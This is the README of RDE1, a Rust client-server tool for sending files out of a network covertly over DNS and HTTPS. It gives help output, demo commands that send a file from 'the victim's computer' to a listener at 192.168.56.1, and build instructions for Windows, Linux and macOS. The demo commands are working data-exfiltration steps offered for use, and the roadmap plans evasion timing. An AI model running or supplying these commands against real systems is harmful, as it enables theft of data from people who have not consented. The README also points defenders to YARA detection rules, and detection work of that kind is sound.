Skip to content

Latest commit

 

History

History
364 lines (265 loc) · 11.7 KB

README.md

File metadata and controls

364 lines (265 loc) · 11.7 KB

:shipit: Information: RDE1 is an old personal project (end 2022) that I didn't continue development on. It's part of a list of projects that helped me to learn Rust. The code is probably considered obsolete and not in its best form. Maybe I'll pick up where I left off #roadmap. However, RDE1 is fully functional and allow to exfiltrate files from DNS and HTTPS queries.

RDE1 (Rusty Data Exfiltrator)

GitHub Windows supported Linux supported macOS supported Twitter Follow


Original logo from: here

⚠️ Disclaimer: RDE1 is for educational purposes only. Use this at your own discretion, I cannot be held responsible for any damages caused. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and are not responsible for any misuse or damage caused by this tool.

🔴 Redteamer: I share with you a beta version of one of my tool allowing to exfiltrate files from DNS and HTTPS queries

🔵 Blueteamer: You can find an example of yara rules for CRDE binary in this same repo

🧮 Summary

🏷️ Description

SRDE (Server Rusty Data Exfiltrator)

CRDE (Client Rusty Data Exfiltrator)

RDE1 it's client and server tool allowing auditor to extract sensitives datas and files from network written in rust.

Today RDE1 can be use to extract files from DNS and HTTPS queries. All datas are encrypted with AES256. You juste need to specify the same password on the server and on the client.

📺 Usage

SRDE Usage

g0h4n@computer$ srde --help

SRDE (Server Rusty Data Exfiltrator) is a tool allowing auditor to extract files from different protocol written in rust.

Usage: srde <COMMAND>

Commands:
  dns    Exfiltrate datas from DNS server
  https  Exfiltrate datas from HTTPS server
  icmp   Exfiltrate datas from ICMP queries (not yet implemented)
  help   Print this message or the help of the given subcommand(s)

Options:
  -h, --help  Print help information
g0h4n@computer$ srde dns --help

Exfiltrate datas from DNS server

Usage: srde dns [OPTIONS] --ip <ip> --port <port> --key <key>

Options:
  -i, --ip <ip>      IP for dns server
  -p, --port <port>  Port for dns server
  -k, --key <key>    Key to decode datas
  -v...              Set the level of verbosity
  -h, --help         Print help information
g0h4n@computer$ srde https --help

Exfiltrate datas from HTTPS server

Usage: srde https [OPTIONS] --ip <ip> --port <port> --private-cert <private-cert> --public-cert <public-cert> --key <key>

Options:
  -i, --ip <ip>                      IP for https server.
  -P, --port <port>                  Port for https server.
      --private-cert <private-cert>  Private certificate for SSL (key.pem)
      --public-cert <public-cert>    Public certificate for SSL (cert.pem)
  -k, --key <key>                    key to decode datas
  -v...                              Set the level of verbosity
  -h, --help                         Print help information

CRDE Usage

g0h4n@computer$ crde --help

CRDE (Client Rusty Data Exfiltrator) is a tool allowing auditor to extract files from different protocol written in rust.

Usage: crde <COMMAND>

Commands:
  dns    Exfiltrate datas from DNS queries
  https  Exfiltrate datas from HTTPS queries
  icmp   Exfiltrate datas from ICMP queries (not yet implemented)
  help   Print this message or the help of the given subcommand(s)

Options:
  -h, --help  Print help information
g0h4n@computer$ crde dns --help

Exfiltrate datas from DNS queries

Usage: crde dns [OPTIONS] --filename <filename> --key <key>

Options:
  -f, --filename <filename>        File to exfiltrate
  -k, --key <key>                  Key to encode datas
  -d, --domain-name <domain-name>  Domain name like google.com where exfiltrate datas
  -n, --name-server <name-server>  Alternative IP address name server to use for queries
      --dns-tcp                    Use TCP instead of UDP for DNS queries
  -v...                            Set the level of verbosity
  -h, --help                       Print help information
g0h4n@computer$ crde https --help

Exfiltrate datas from HTTPS queries

Usage: crde https [OPTIONS] --filename <filename> --url <url> --key <key>

Options:
  -f, --filename <filename>  File to exfiltrate
  -u, --url <url>            URL site to extract datas like: https://www.htwmcl.fr/ or https://127.0.0.1:443/
  -k, --key <key>            key to encode datas
  -v...                      Set the level of verbosity
  -h, --help                 Print help information

📺 Demo

Demo with DNS exfiltration

Server command line example with DNS from Linux:

sudo ./srde_release dns -k P4ssW0rD12345 -i 192.168.56.1 -P 53

Client command line example with DNS from Windows:

crde_x64.exe dns -f test.txt -k P4ssW0rD12345 -d google.com -n 192.168.56.1

In this example the auditor extracts the file test.txt from the victim's computer via DNS query to the server 192.168.56.1.

Demo with HTTPS exfiltration

Server command line example with HTTPS from Linux:

sudo ./srde_release https -i 0.0.0.0 -P 443 -k PassWord --private-cert server/key.pem --public-cert server/cert.pem

Client command line example with HTTPS from Windows:

crde_x64.exe https -f test.txt -u https://192.168.56.1/ -k PassWord

In this example the auditor extracts the file test.txt from the victim's computer via HTTPS query to the server 192.168.56.1.

🚜 How to compile it?

Using Makefile

You can use the make command to compile it for Linux, Windows or mac0S.

More command in the Makefile:

SRDE server:
usage: make srde_debug
usage: make srde_release
usage: make srde_windows
usage: make srde_windows_x64
usage: make srde_windows_x86
usage: make srde_linux
usage: make srde_linux_aarch64
usage: make srde_linux_x86_64
usage: make srde_macos
usage: make srde_arm_musl
usage: make srde_armv7

CRDE client:
usage: make crde_debug
usage: make crde_release
usage: make crde_windows
usage: make crde_windows_x64
usage: make crde_windows_x86$
usage: make crde_linux
usage: make crde_linux_aarch64
usage: make crde_linux_x86_64
usage: make crde_macos
usage: make crde_arm_musl
usage: make crde_armv7

Dependencies:
usage: make install_windows_deps
usage: make install_macos_deps

Documentation:
usage: make srde_doc
usage: make crde_doc

Cleaning:
usage: make clean

Using Dockerfile

Build RED1 with docker to make sure to have all dependencies.

docker build --rm -t rde1 .

# Build SRDE server:
docker run --rm -v ./:/usr/src/rde1 rde1 srde_windows
docker run --rm -v ./:/usr/src/rde1 rde1 srde_linux
docker run --rm -v ./:/usr/src/rde1 rde1 srde_macos


# Build CRDE client:
docker run --rm -v ./:/usr/src/rde1 rde1 crde_windows
docker run --rm -v ./:/usr/src/rde1 rec2 crde_linux
docker run --rm -v ./:/usr/src/rec2 rec2 crde_macos
SHOW MORE

Using simply cargo

You need to install rust on your system (Windows/Linux/MacOS).

https://www.rust-lang.org/fr/tools/install

Here is how to compile the "release" and "debug" versions from "cargo" command.

Client binary:

git clone https://github.com/g0h4n/RDE
cd RDE
cargo b --release --manifest-path client/Cargo.toml
#or debug version
cargo b --manifest-path client/Cargo.toml

The result can be found in "client/target/release/" or in "client/target/debug/" folder.

Server binary:

git clone https://github.com/g0h4n/RDE
cd RDE
cargo b --release --manifest-path server/Cargo.toml
#or debug version
cargo b --manifest-path server/Cargo.toml

The result can be found in "server/target/release/" or in "server/target/debug/" folder.

Below you can find the compilation methodology for each of the OS from Linux. If you need another compilation system, please consult the list in this link : https://doc.rust-lang.org/nightly/rustc/platform-support.html

Manually for Windows static version from Linux

#Install rustup and cargo in Linux
curl https://sh.rustup.rs -sSf | sh

#Add Windows deps
rustup install stable-x86_64-pc-windows-gnu
rustup target add x86_64-pc-windows-gnu

#Static compilation for Windows
git clone https://github.com/g0h4n/RDE
cd RDE

#Compile static client "crde.exe"
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path client/Cargo.toml
#Compile static server "srde.exe"
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path server/Cargo.toml

The client crde.exe binary can be found in "client/target/x86_64-unknown-linux-gnu/release/" folder.

The server srde.exe binary can be found in "server/target/x86_64-unknown-linux-gnu/release/" folder.

🚦 Roadmap

  • Exiltration

    • DNS queries
    • HTTPS queries
    • ICMP queries
    • Add OPPSEC mode with --timer and --jitser values
  • Crypto

    • XOR (not used)
    • AES-256-CBC (default) (may be vulnerable to the "Padding Oracle" method which allows to find the blocks in clear text)
  • Versions

    • Linux
    • Windows
    • macOS (not tested)

🔗 Links